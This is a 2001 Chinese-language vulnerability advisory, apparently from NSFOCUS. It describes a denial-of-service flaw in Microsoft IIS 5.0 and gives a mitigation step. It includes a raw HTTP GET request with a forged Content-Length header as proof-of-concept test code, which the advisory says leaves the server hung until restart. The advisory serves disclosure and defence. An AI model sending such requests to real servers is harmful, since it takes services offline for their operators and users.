Microsoft IIS 伪造的 “Content-Length” 拒绝服务漏洞

/ns/ld/win/data/20011218211225.htm

发布日期: 2001-12-11

更新日期: 2001-12-18
受影响的系统: Microsoft IIS 5.0
+ Microsoft Windows 2000 Datacenter Server
+ Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP2
+ Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP2
+ Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP2

描述:
--------------------------------------------------------------------------------

BUGTRAQ ID: 3667

通过向IIS 5.0发送一个精心构造的请求，可能导致IIS 5.0拒绝服务。

当IIS 5.0接到一个包含伪造的“Content-Length”域的GET请求时，会以一种异常的方
式处理该请求，即IIS 5.0保持该连接并且不超时，但是不再响应其它请求，只有重新
启动才能恢复正常工作。

<*来源：Ivan Hernandez Puga
（ivan.hernandez@globalsis.com.ar)
链接：http://archives.neohapsis.com/archives/bugtraq/2001-12/0098.html
*>



测试程序：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！


Ivan Hernandez Puga （ivan.hernandez@globalsis.com.ar)提供了
如下测试代码：

GET /testfile HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-excel, application/vnd.ms-powerpoint,
application/msword, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: 192.168.0.10
Connection: Keep-Alive
Content-Length: 5300643
Authorization: Basic



--------------------------------------------------------------------------------
建议:
临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 通过配置限制非信任主机对80端口的访问

厂商补丁：

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本：
http://www.microsoft.com




绿盟科技翻译整理，未经许可，不得转载